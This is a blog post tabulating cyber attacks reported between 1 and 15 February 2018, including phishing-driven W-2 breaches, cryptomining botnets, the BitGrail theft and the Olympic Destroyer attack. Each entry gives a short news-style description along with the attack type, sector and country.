1-15 February 2018 Cyber Attacks Timeline

it’s time to publish the first timeline of February 2018, covering the main cyber attacks occurred in the first half of the second month of this troubled year. Yes because 2018 has just begun and the growing trend of massive attacks seems unstoppable.

And part of this is due, how strange, to the new gold rush of cryptocurrencies: if you scroll down the list you will find 16 events whose direct or indirect purpose is to steal cryptocurrency. And you will notice a wide range of attack vectors: 0-day vulnerabilities on messaging services (Telegram) or automation servers (Jenkins), primary domains injected with miners, another cryptocurrency exchange hacked (Bitgrail) with a possible loss of $170 million worth, operations carried on by (un)common criminals or state-sponsored groups (like the North Korean Lazarus Group AKA Hidden Cobra).

But February 2018 was also the month of the Winter Olympic Games, and we could expect a cyber attack disrupting the opening ceremony, which obviously happened (and maybe part of a wider operation).

Last but not least, February has brought yet another mega breach, affecting Swisscom, and compromising potentially 800,000 individuals, one tenth of the whole Swiss population.

As usual, if you want to have an idea of how fragile our electronic identity is inside the cyberspace, have a look at the timelines of the main Cyber Attacks in 2011, 2012, 2013, 2014, 2015, 2016 , and 2017 (regularly updated). You may also want to have a look at the Cyber Attack Statistics that are regularly published, and follow @paulsparrows on Twitter for the latest updates.

Additionally, feel free to submit remarkable incidents that in your opinion deserve to be included in the timelines (and charts). If useful, you can access the timeline in Google Sheet format.

101/02/2018?Single IndividualsThe FBI warns hackers have been impersonating a federal online crime complaint portal to trick victims into divulging their personal and sensitive information in a new phishing scam.Account HijackingX IndividualCC>1
201/02/2018Iron TigerInstitutions in the government, technology, education and telecommunications sector in Asia and the US.Security researchers from BitDefender discover a custom-built piece of malware wreaking havoc in Asia for several months that could signal the return of the notorious Chinese hacker group - Iron Tiger. The campaign is called Operation PZChao, and has been targeting institutions in the government, technology, education and telecommunications sector in Asia and the US.Targeted AttackY Multiple IndustriesCE>1
301/02/2018?Google Chrome UsersSecurity researchers from Trend Micro uncover 89 malicious Google Chrome extensions on the official Chrome store that can inject ads, code to secretly mine cryptocurrency, and load a tool to record and replay a person's browsing activities. According to researchers, this collection of extensions affected over 423,000 users and was used to form a new botnet called "Droidclub."MalwareX IndividualCC>1
401/02/2018?IoT DevicesResearchers from cyber-security firm Radware discover a new IoT DDoS botnet, built by San Calvicie, an operator of a gaming server rental business. The botnet is called JenX. The botnets borrows parts of different other IoT botnets (for instance CVE-2014-8361 and CVE-2017–17215).VulnerabilityX IndividualCC>1
501/02/2018?City of Pittsburg in KansasThe City of Pittsburg in Kansas reveals to have been subjected to a sophisticated phishing scheme targeting employee payroll data. The attack results in the release of sensitive information for current and former city employees who received a W-2 for the 2017 fiscal year.Account HijackingO Public administration and defence, compulsory social securityCCUS
601/02/2018?HORNE LLPHORNE LLP notifies an incident affecting the security of protected health information of certain Forrest General Hospital patients. On November 1, 2017, the company discovered that the email account of one of its employees was sending phishing emails.Account HijackingK Financial and insurance activitiesCCUS
701/02/2018?City of BataviaThe city of Batavia reports employees’ personal and financial information was compromised through an email phishing of W-2 tax forms. The information includes names, social security numbers, addresses and earnings.Account HijackingO Public administration and defence, compulsory social securityCCUS
801/02/2018?Kinetics SystemsKinetics Systems falls victim of a phishing attack. The personal information of 11 residents of New Hampshire, including their W-2 forms, is compromised.Account HijackingC ManufacturingCCUS
901/02/2018?Purchase Line School DistrictThe Purchase Line School District is the victim of a email spoofing attack by an individual pretending to be a school district employee.Account HijackingP EducationCCUS
1001/02/2018?Coastal Cape Fear Eye AssociatesCoastal Cape Fear Eye Associates notifies HHS of a ransomware incident that impacted 925 patients.MalwareQ Human health and social work activitiesCCUS
1101/02/2018?AperioAperio informs of a data breach that occurred when two employees’ email accounts were compromised by successful phishing attacks that resulted in auto-forwarding email from those accounts to two external accounts.Account HijackingK Financial and insurance activitiesCCUS
1202/02/2018?Redis and OrientDB serversResearchers from Qihoo 360 discover a new Monero-mining botnet targeting Redis and OrientDB servers, infecting nearly 4,400 servers and able to mine over $925,000 worth of Monero since March 2017. The botnet, called DDG, targets Redis servers via a credentials dictionary brute-force attack; and OrientDB databases by exploiting the CVE-2017-11467 remote code execution.Brute Force/Remote Code Execution VulnerabilityX IndividualCC>1
1302/02/2018?Mac UsersResearchers from Malwarebytes reveal that the MacUpdate site has been hacked to distribute the OSX.CreativeUpdate Monero miner via maliciously-modified copies of the Firefox, OnyX, and Deeper applications.MalwareX IndividualCC>1
1402/02/2018?Ron’s Pharmacy ServicesRon’s Pharmacy Services notifies certain patients of the unauthorized access to certain limited pieces of patient information, including patient names, Ron’s Pharmacy internal account numbers, and payment adjustment information, after an employee email account was compromised in October 2017.Account HijackingG Wholesale and retail tradeCCUS
1503/02/2018?Android UsersResearchers from Qihoo 360 discover an additional botnet, targeting Android devices by scanning for open debug ports so it can infect victims with malware that mines the Monero cryptocurrency. The botnet targets port 5555, which on devices running the Android OS is the port used by the operating system's native Android Debug Bridge (ADB). The malware is dubbed ADB.Miner.MalwareX IndividualCC>1
1604/02/2018?Reddit UsersSecurity Researcher Alec Muffett discovers a clone of the popular social news aggregation and discussion site Reddit on the reddit.co domain.Account HijackingX IndividualCC>1
1704/02/2018?City of KeokukThe City of Keokuk says a data breach resulted in the release of personal information of current and former city employees and elected leaders. An unauthorized party was able to obtain 2017 W-2 tax forms through the use of a “criminal phishing email.”Account HijackingO Public administration and defence, compulsory social securityCCUS
1805/02/2018?Waldo CountyA phishing attack compromised the information of 100 Waldo County employeesAccount HijackingO Public administration and defence, compulsory social securityCCUS
1905/02/2018?City of KeokukThe city of Keokuk has disclosed that a cybercriminal used a phishing scam to fraudulently obtain an electronic file containing the 2017 W-2 tax forms of current and former employees and elected officials.Account HijackingO Public administration and defence, compulsory social securityCCUS
2005/02/2018?Partners HealthCare SystemPartners HealthCare System reveals to have discovered a malware attack, occurred in May, 2017 that may have exposed 2,600 patients’ information.MalwareQ Human health and social work activitiesCCUS
2105/02/2018?University of Northern ColoradoThe private information of 12 University of Northern Colorado employees is compromised lafter an “unknown person or group” accessed their profiles on Ursa, UNC’s online portal.UnknownP EducationCCUS
2206/02/2018Hidden Cobra, aka Lazarus GroupMultiple TargetsThe Department of Homeland Security (DHS) and FBI jointly release two new reports analyzing trojan malware attributed to Hidden Cobra, aka Lazarus Group -- a threat actor widely believed to be sponsored by the North Korean government. The two malware packages, referred to as HARDRAIN and BADCALL, can install a remote access tool (RAT) payload on Android devices, and force infected Windows systems to act as a proxy server.Targeted AttackY Multiple IndustriesCE>1
2306/02/2018AnonPlusItalian Democratic Party (PD)The AnonPlus hacker group says they have hacked the Florence branch of the Italian centre-left Democratic Party (PD) and leaked data regarding leader Matteo Renzi online.UnknownU Activities of extraterritorial organizations and bodiesHIT
2406/02/2018AnonPlusProvince of MilanThe same hackers also claim to have hacked the website of Provincia di Milano (Province of Milan) in Italy.SQLiO Public administration and defence, compulsory social securityHIT
2507/02/2018?SwisscomSwisscom, the biggest telecom company in Switzerland, suffers a data breach that resulted in the compromise of personal data of some 800,000 customers, i.e., nearly ten percent of the entire Swiss population. The breach dates back to Autumn 2017 and the data accessed includes the first and last names, home addresses, dates of birth and telephone numbers of Swisscom customers.Account HijackingJ Information and communicationCCCH
2607/02/2018?The Sacramento BeeThe Sacramento Bee deletes two databases hosted by a third party after a ransomware attack exposed the voter records of 19.5 million California voters and 53,000 current and former subscribers to the newspaper.MalwareJ Information and communicationCCUS
2707/02/2018?Nova PoshtaPersonal data of 500,000 Nova Poshta clients, the largest private delivery company in Ukraine, is allegedly leaked to dark web.UnknownS Other service activitiesCCUA
2807/02/2018?City of EnumclawThe city of Enumclaw accidentally sends an email to an "individual pretending to be a member of City administration" and compromises the W-2s of hundreds of employees.Account HijackingO Public administration and defence, compulsory social securityCCUS
2907/02/2018?Twitter UsersOnline scammers have made over $5,000 worth of Ethereum in one night alone, creating fake Twitter profiles for real-world celebrities and spamming the social network with messages tricking users to participate in "giveaways."Fake Twitter AccountsX IndividualCC>1
3007/02/2018?Targets in Middle EastResearchers from Cisco Talos reveal the details of a campaign targeted against entities with an interest in the geopolitical context of the region.Targeted AttackY Multiple IndustriesCE>1
3107/02/2018?Business WirePress release network Business Wire admits suffering an ongoing Distributed Denial of Service (DDoS) attack lasting a week.DDoSJ Information and communicationCCUS
3207/02/2018?Smith DentalSmith Dental notifies of a ransomware attack affecting 1,500 patients.MQ Human health and social work activitiesCCUS
3308/02/2018?Undisclosed Water Utility CompanyResearchers from Radiflow discover the first example of a malware attacking the operational network of a water utility company in order to mine the Monero cryptocurrency,MalwareE Water supply, sewerage waste management, and remediation activitiesCCN/A
3408/02/2018?Decatur County General HospitalDecatur County General Hospital in Parsons, Tenn., publicly discloses that an unauthorized party accessed the server for its electronic medical record system and secretly implanted cryptomining malware.MalwareQ Human health and social work activitiesCCUS
3508/02/2018?Single IndividualsResearchers from Trend Micro reveal the details of a malicious spam campaign aimed to distribute the Loki malware.MalwareX IndividualCC>1
3608/02/2018?Mikaela HooverThe Fappening scandal continues even in 2018, and Guardians of the Galaxy actress Mikaela Hoover appears to be the most recent victim.Account HijackingX IndividualCCUS
3708/02/2018?Multiple TargetsResearchers from ForcePoint discover a new strain of point-of-sale (PoS) malware that disguises itself as a LogMeIn service pack and steals payment card information through a DNS server.PoS MalwareY Multiple IndustriesCC>1
3808/02/2018?Cisco ASA UsersFive days after details about a vulnerability in Cisco ASA software (CVE-2018-0101) becomes public, Cisco reveals to be "aware of attempted malicious use of the vulnerability."Cisco ASA VulnerabilityY Multiple IndustriesCC>1
3908/02/2018?Single IndividualsA new malspam campaign is underway, installing the GandCrab ransomware on a victim's computer. This is done through a series of malicious documents that ultimately install the ransomware via a PowerShell script.MalwareX IndividualCC>1
4009/02/2018?Single IndividualsA new ransomware is discovered called Black Ruby. The ransomware encrypts the files on a computer, scrambles the file name, and then appends the BlackRuby extension. To make matters worse, Black Ruby also installs a Monero miner. The malware only encrypts computer not from Iran.MalwareX IndividualCC>1
4110/02/2018Vietnamese HackerNewtek Business Services Corp.,Newtek Business Services Corp., a Web services conglomerate that operates more than 100,000 business Web sites and some 40,000 managed technology accounts, has several of its core domain names stolen over the weekend.DNS HijackingJ Information and communicationCCUS
4210/02/2018?BitGrailItalian cryptocurrency exchange BitGrail reports a loss of 17 million Nano, valued at over $170 million at the time of the hack. However, conflicting reports surface with some believing the exchange to be insolvent for a number of months.UnknownV FintechCCIT
4311/02/2018?Pyeongchang Winter OlympicsPyeongchang Winter Olympics organizers confirm that the Games had fallen victim to a cyber attack during Friday’s opening ceremony, but they refused to reveal the source. Researchers from Cisco Talos call the malware Olympic Destroyer and confirm that the only purpose is to disrupt systems.Targeted AttackU Activities of extraterritorial organizations and bodiesCWKR
4411/02/2018?4,275 sites4,275 sites are injected with an in-browser Monero miner after a popular accessibility script, BrowseAloud by TextHelp.com, is compromised. The list of the affected sites includes government websites such as uscourts.gov, ico.org.uk, & manchester.gov.uk.Malicious ScriptY Multiple IndustriesCC>1
4512/02/2018?Wordpress WebsitesTwo malicious plug-ins are recently discovered by Sucuri, injecting obfuscated JavaScript into WordPress websites, in order to generate advertisements that appear if a visitor clicks anywhere on the page.Wordpress Malicious PluginsX IndividualCC>1
4612/02/2018?Android UsersMalwarebytes researchers detect a series of attacks that began around November 2017 in which millions of Android devices were targeted redirecting to a specifically designed page performing in-browser cryptomining of Monero virtual currency.Drive-ByX IndividualCC>1
4712/02/2018Hidden Cobra, aka Lazarus GroupBitcoin users and global financial organizations.Researchers from McAfee discover an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact. The campaign is dubbed HaoBao and targets Bitcoin users and global financial organizations.Targeted AttackK Financial and insurance activitiesCC>1
4812/02/2018?Single IndividualsA new variant of Rapid Ransomware is currently being distributed using malspam that pretends to be from the Internal Revenue Service.MalwareX IndividualCC>1
4912/02/2018?Single IndividualsResearchers from IBM's X-Force reveal the details of a new campaign leveraging the Necurs botnet to send Valentine’s Day-themed spam emails. The campaign reaches over 230 million spam messages within a matter of two weeks.MalwareX IndividualCC>1
5012/02/2018?Idaho Transportation Department (ITD)A hack of two email accounts at the Idaho Transportation Department (ITD) potentially exposes the personal information of commercial truckers whose rigs are registered in Idaho, including Social Security and credit card numbers. About 114 individuals are notified.Account HijackingO Public administration and defence, compulsory social securityCCUS
5112/02/2018?EntergyEntergy notifies employees of a W-2 breach involving the TALX portal (a wholly-owned subsidiary of Equifax). The breach involves 2016 W-2 data.UnknownD Electricity gas steam and air conditioning supplyCCUS
5213/02/2018?Telegram UsersResearchers from Kaspersky reveal that malware authors have used a zero-day vulnerability in the Windows client for the Telegram instant messaging service to infect users with cryptocurrency mining malware (Monero, Zcash, and Fantomcoin primarily).Zero-Day Vulnerability in TelegramX IndividualCC>1
5313/02/2018?Android UsersResearchers from Trend Micro detect a new variant of Android Remote Access Tool (AndroRAT) (identified as ANDROIDOS_ANDRORAT.HRXC) that has the ability to inject root exploits. The AndroRAT targets CVE-2015-1805, a publicly disclosed vulnerability in 2016.MalwareX IndividualCC>1
5413/02/2018?Military personnel and businessmen, among others, in various South Asian countriesValentine's Day is approaching, and researchers from Trend Micro reveal that criminals from the Confucius gang are targeting military personnel and businessmen, among others, in various South Asian countries, persuading them into downloading malware hidden in chat apps.Targeted AttackX IndividualCE>1
5513/02/2018?Vulnerable FirewallsResearchers from NewSky Security discover a new IoT botnet, dubbed DoubleDoor, exploiting CVE-2015–7755 and CVE-2016–10401 to bypass respectively Juniper and Zyxel firewalls.MalwareY Multiple IndustriesCC>1
5613/02/2018?Advertisement Screen in LondonAnd the last victim of the cryptocurrency frenzy is an advertisement screen in London that is infected by a miner.MalwareZ UnknownCCUK
5714/02/2018?Staybridge Suites Lexington HotelThe Staybridge Suites Lexington Hotel is hit with what appears to be a point of sales data breach that occurred when several devices at the hotel were hit with malware.PoS MalwareR Arts entertainment and recreationCCUS
5814/02/2018?Single IndividualsResearchers from Trustwave reveal a new multi-stage email word attack, exploiting CVE-2017-11882, but not making use of any macro.MalwareX IndividualCC>1
5914/02/2018?Single IndividualsA Ukrainian cybercrime operation has made an estimated $50 million by using Google AdWords to lure users on Bitcoin phishing sites. The operation is temporarily disrupted by the Ukrainian cyber police, acting on information received from Cisco's Talos security division. The campaign is dubbed Coinhoarder.SEO PoisoningX IndividualCC>1
6014/02/2018?Bitmessage usersMaintainers of the Bitmessage P2P encrypted communications protocol have released a fix after discovering that hackers were using a zero-day in attempts to steal Bitcoin wallet files from users' computers.Zero-Day Vulnerability in BitmessageX IndividualCC>1
6114/02/2018?AtosReports emerge that the Olympic Destroyer malware might be used months before to target Atos, the IT provider of Winter Olympics.Targeted AttackJ Information and communicationCEFR
6214/02/2018?Western UnionWestern Union warns that some customers' information may have been accessed without authorization as a result of a computer intrusion against an external vendor system formerly used by Western Union for secure data storageUnknownK Financial and insurance activitiesCCUS
6315/02/2018?Jenkins CI ServersResearchers from Check Point reveal the details of Jenkins Miner, a massive operation targeting Jenkins CI servers, via CVE-2017-1000353, aimed to mine Monero cryptocurrency. The Criminals are ableMalwareY Multiple IndustriesCC>1
6415/02/2018?Retina-X StudiosA vigilante hacker claims to have wiped 1 Terabyte of data from Retina-X Studios, a company that sells spyware products.UnknownJ Information and communicationCCUS
6515/02/2018GOLD LOWELLMultiple TargetsResearchers from SecureWorks reveal the detail of a threat actor dubbed GOLD LOWELL using the SAMSAM ransomware for opportunistic attacks.MalwareY Multiple IndustriesCCUS
6615/02/2018?Single IndividualsResearchers from IBM's X-Force discover a new variant of the infamous TrickBot malware repurposed to steal bitcoins.MalwareX IndividualCC>1

Leave a Reply

%d bloggers like this: